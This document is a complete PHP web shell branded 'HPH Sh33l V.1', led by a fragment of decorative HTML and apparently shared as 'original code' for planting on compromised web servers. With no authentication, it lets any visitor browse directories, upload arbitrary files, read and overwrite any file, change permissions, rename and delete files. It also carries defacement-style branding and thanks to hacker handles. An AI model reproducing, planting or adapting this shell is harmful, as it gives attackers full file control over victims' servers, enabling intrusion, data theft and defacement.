hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 2px; top: -337px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1575px; top: -71px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 403px; top: -380px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 897px; top: -963px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 979px; top: -895px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 796px; top: -771px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 899px; top: -152px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1233px; top: -644px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1546px; top: -586px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1498px; top: -947px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 474px; top: -845px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 34px; top: -199px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 124px; top: -148px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1166px; top: -835px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1130px; top: -741px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1396px; top: -561px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1475px; top: -238px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 130px; top: -689px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 834px; top: -866px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 925px; top: -511px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 410px; top: -332px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1385px; top: -579px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 119px; top: -919px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1427px; top: -330px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 426px; top: -333px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1304px; top: -120px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1589px; top: -339px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1122px; top: -39px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1548px; top: -746px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1672px; top: -880px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 25px; top: -673px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 454px; top: -877px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 706px; top: -513px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1132px; top: -584px;">•</div></html>

Original PHP code

<?php
 set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>
<!DOCTYPE html>
<html lang="en-US">

		 <head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>HPH Sh33l V.1</title>
				<link rel="icon" href="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg" />
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
		  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
				<center>
				<img width="300" height="300" src="https://i.ibb.co/PcxnLxh/FB-IMG-1656485414925.jpg"><br><br><audio src="https://b.top4top.io/m_1832kvrfv2.m4a" type="audio/mpeg" controls="controls" autoplays="autoplays"></a>
				</center>
			 <center><h4><font face="courier new" color="red">Ganteng Doang Upload Shell Gak Bisa</font></h4></center>
			 <br>
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tr>
					<td>
						<?php echo php_uname();?>
						
						<br>
<?php
 if(isset($_GET['path'])){$path=$_GET['path'];}else {$path=getcwd();}$path=str_replace('\\','/',$path);$paths=explode('/',$path);foreach($paths as $id=>$pat){if($pat==''&&$id==0){$a=true;echo '
						<a class="wrn" href="?path=/">/</a>';continue;}if($pat=='')continue;echo '							
						<a class="wrn" href="?path=';for($i=0;$i<=$id;$i++){echo "$paths[$i]";if($i!=$id)echo "/";}echo '">'.$pat.'</a>/';}echo '
					</td>
				</tr>

				<tr>
					<td>';if(isset($_FILES['file'])){if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){echo '
						<script>alert("OK");</script>
						
						<br>
						';}else{echo '
						<script>alert("FAIL");</script>
						
						<br>
						';}}?>

						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file" />
							<input type="submit" value=">>" />
						</form>
					</td>
				</tr>
<?php
 if(isset($_GET['filesrc'])){echo "				<tr>
					<td>
					
					<br>
					
					<center>
					";echo "<font color=\"#00FF66 \">".$_GET['filesrc']."</font>";echo '
					</center>
					</td>
				</tr>
			</table>
			
			<br>';echo('
			
			<pre>
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'			
			</pre>');}elseif(isset($_GET['option'])&&$_POST['opt']!='delete'){echo '				</table>
		 
				<br>
		 
				<center>'.$_POST['path'].'
				
				<br>
				<br>';if($_POST['opt']=='chmod'){if(isset($_POST['perm'])){if(chmod($_POST['path'],$_POST['perm'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}?>


				<form method="POST">
					Permission : 
					<input name="perm" type="text" size="4" value="<?php echo substr(sprintf('%o',fileperms($_POST['path'])),-4);?>" />
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="chmod">
					<input type="submit" value=">>" />
				</form>
<?php
 }elseif($_POST['opt']=='rename'){if(isset($_POST['newname'])){if(rename($_POST['path'],$path.'/'.$_POST['newname'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}$_POST['name']=$_POST['newname'];}?>


				<form method="POST">
					New Name : 
					<input name="newname" type="text" size="20" value="<?php echo $_POST['name'];?>" />
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="rename">
					<input type="submit" value=">>" />
				</form>
<?php
 }elseif($_POST['opt']=='edit'){if(isset($_POST['src'])){$fp=fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}fclose($fp);}?>


				<form method="POST">
				
					<textarea cols=80 rows=20 name="src">
<?php echo htmlspecialchars(file_get_contents($_POST['path']));?>
</textarea>
					
					<br>
					
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="edit">
					<input type="submit" value=">>" />
				</form>
<?php
 }echo '				</center>';}else{echo '			 </table>
		 
			 <br>
		 
			 <center>';if(isset($_GET['option'])&&$_POST['opt']=='delete'){if($_POST['type']=='dir'){if(rmdir($_POST['path'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}elseif($_POST['type']=='file'){if(unlink($_POST['path'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}}echo '</center>';$scandir=scandir($path);?>


			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					
<?php
 foreach($scandir as $dir){if(!is_dir("$path/$dir")||$dir=='.'||$dir=='..')continue;echo "					
					<tr>
						<td>
							<a class=\"wrn\" href=\"?path=$path/$dir\">$dir</a>
						</td>								
						<td>
							<center>--</center>
						</td>						
						<td>
							<center>";if(is_writable("$path/$dir"))echo '<font color="#00BB00">';elseif(!is_readable("$path/$dir"))echo '<font color="red">';echo perms("$path/$dir");if(is_writable("$path/$dir")||!is_readable("$path/$dir"))echo '</font>';echo "</center>
						</td>
						<td>
							<center>
								<form method=\"POST\" action=\"?option&path=$path\">
								
									<select name=\"opt\">
										<option value=\"\"></option>
										<option value=\"delete\">Delete</option>
										<option value=\"chmod\">Chmod</option>
										<option value=\"rename\">Rename</option>
									</select>
									
									<input type=\"hidden\" name=\"type\" value=\"dir\">
									<input type=\"hidden\" name=\"name\" value=\"$dir\">
									<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
									<input type=\"submit\" value=\">>\" />
								</form>
							</center>
						</td>
					</tr>";}?>

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
<?php
 foreach($scandir as $file){if(!is_file("$path/$file"))continue;$size=filesize("$path/$file")/1024;$size=round($size,3);if($size>=1024){$size=round($size/1024,2).' MB';}else{$size=$size.' KB';}echo "					<tr>
						<td>
							<a class=\"wrn\" href=\"?filesrc=$path/$file&path=$path\">$file</a>
						</td>
						
						<td>
							<center>".$size."</center>
						</td>
						<td>
							<center>";if(is_writable("$path/$file"))echo '
								<font color="#00BB00">';elseif(!is_readable("$path/$file"))echo '
								<font color="red">';echo perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo '</font>';echo "
							</center>
						</td>
						<td>
							<center>
								<form method=\"POST\" action=\"?option&path=$path\">
								
									<select name=\"opt\">
										<option value=\"\"></option>
										<option value=\"delete\">Delete</option>
										<option value=\"chmod\">Chmod</option>
										<option value=\"rename\">Rename</option>
										<option value=\"edit\">Edit</option>
									</select>
									
									<input type=\"hidden\" name=\"type\" value=\"file\">
									<input type=\"hidden\" name=\"name\" value=\"$file\">
									<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
									<input type=\"submit\" value=\">>\" />
								</form>
							</center>
						</td>
					</tr>";}echo '
				</table>
			</div>';}?>


			<br>
			
			<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For 0xGh05T - DSRF14 - Mr.Dan07 - Leri01 - FxshX7 - AlkaExploiter - xLoveSyndrome'z - Acep Gans'z </font></h4></b></marquee></center>
		</body>
</html>
<?php
 function perms($file){$perms=fileperms($file);if(($perms&0xC000)==0xC000){$info='s';}elseif(($perms&0xA000)==0xA000){$info='l';}elseif(($perms&0x8000)==0x8000){$info='-';}elseif(($perms&0x6000)==0x6000){$info='b';}elseif(($perms&0x4000)==0x4000){$info='d';}elseif(($perms&0x2000)==0x2000){$info='c';}elseif(($perms&0x1000)==0x1000){$info='p';}else {$info='u';}$info.=(($perms&0x0100)?'r':'-');$info.=(($perms&0x0080)?'w':'-');$info.=(($perms&0x0040)?(($perms&0x0800)?'s':'x'):(($perms&0x0800)?'S':'-'));$info.=(($perms&0x0020)?'r':'-');$info.=(($perms&0x0010)?'w':'-');$info.=(($perms&0x0008)?(($perms&0x0400)?'s':'x'):(($perms&0x0400)?'S':'-'));$info.=(($perms&0x0004)?'r':'-');$info.=(($perms&0x0002)?'w':'-');$info.=(($perms&0x0001)?(($perms&0x0200)?'t':'x'):(($perms&0x0200)?'T':'-'));return $info;}?>